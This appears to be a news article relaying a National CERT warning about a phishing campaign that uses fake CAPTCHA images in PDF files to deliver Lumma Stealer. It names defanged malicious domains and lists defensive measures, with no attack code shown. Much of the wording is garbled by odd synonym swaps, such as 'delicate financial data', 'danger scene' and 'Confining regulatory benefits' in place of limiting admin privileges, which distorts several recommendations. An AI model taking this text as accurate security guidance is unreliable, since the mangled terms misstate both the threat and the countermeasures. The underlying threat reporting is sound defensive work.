Hajra Naz
The National Computer Emergency Response Team (National CERT) has issued a warning about a sophisticated phishing campaign exploiting fake CAPTCHA images in PDF files to spread Lumma Stealer malware.
Scope of the Attack
The attack has affected thousands of users across various sectors, including technology, financial services, and manufacturing. The primary targets are located in North America, Asia, and Southern Europe.
Cybercriminals Exploit Search Engine Manipulation
Hackers are utilizing search engine manipulation methods to disperse malicious PDFs. These PDFs divert users to fake websites outlined to take delicate financial data or silently introduce malware on their gadgets.
How the Attack Works
The attack involves deceptive PDF files containing fake CAPTCHA images. These images prompt users to click on a link, leading them to phishing websites. Once on these fraudulent sites, victims either have their financial data stolen or fall prey to PowerShell scripts that exploit MSHTA commands to install Lumma Stealer malware.
The attackers are hosting these PDFs on seemingly legitimate platforms such as PDFCOFFEE, PDF4PRO, and Internet Archive, making them appear trustworthy in search engine results.
Read More: Hackers Target WordPress Sites to Distribute Malware – Stay Safe!
The Dangers of Lumma Stealer Malware
Lumma Stealer is a Malware-as-a-Service (MaaS) device that takes login credentials, browser cookies, and cryptocurrency wallet information. Moreover, it sends GhostSocks, a proxy malware that takes advantage of the victim’s web connection. Stolen credentials are sold on underground forums like Leaky[.]pro. Malicious domains associated with this attack include pdf-freefiles[.]com, webflow-docs[.]info, secure-pdfread[.]site, and docsviewing[.]net.
Recommended Security Measures
National CERT advises immediate action to protect against this threat. Key recommendations include:
- Employee Education: Raising mindfulness about phishing dangers and suspicious links.
- Advanced Endpoint Protection: Actualizing stronger endpoint security to distinguish and anticipate malware.
- Restrict PowerShell and MSHTA: Limiting the execution of these scripts to prevent malware installation.
- Block Malicious Domains: Blocking known malicious domains and monitoring for new fraudulent websites.
- Enable PowerShell Logging: To track suspicious activity related to PowerShell commands.
- Enforce Multi-Factor Authentication (MFA): Reducing the risk of credential theft.
Proactive Cybersecurity Practices
To combat the advancing danger scene, National CERT inclinations organizations to execute best practices in cybersecurity. They include:
- Regular patch management to address vulnerabilities.
- Confining regulatory benefits to restrain potential assault surfaces.
- Using application whitelisting to avoid unauthorized applications from executing.
As cybercriminals proceed to refine their strategies, remaining careful and reinforcing security protocols are fundamental for safeguarding against large-scale information breaches.
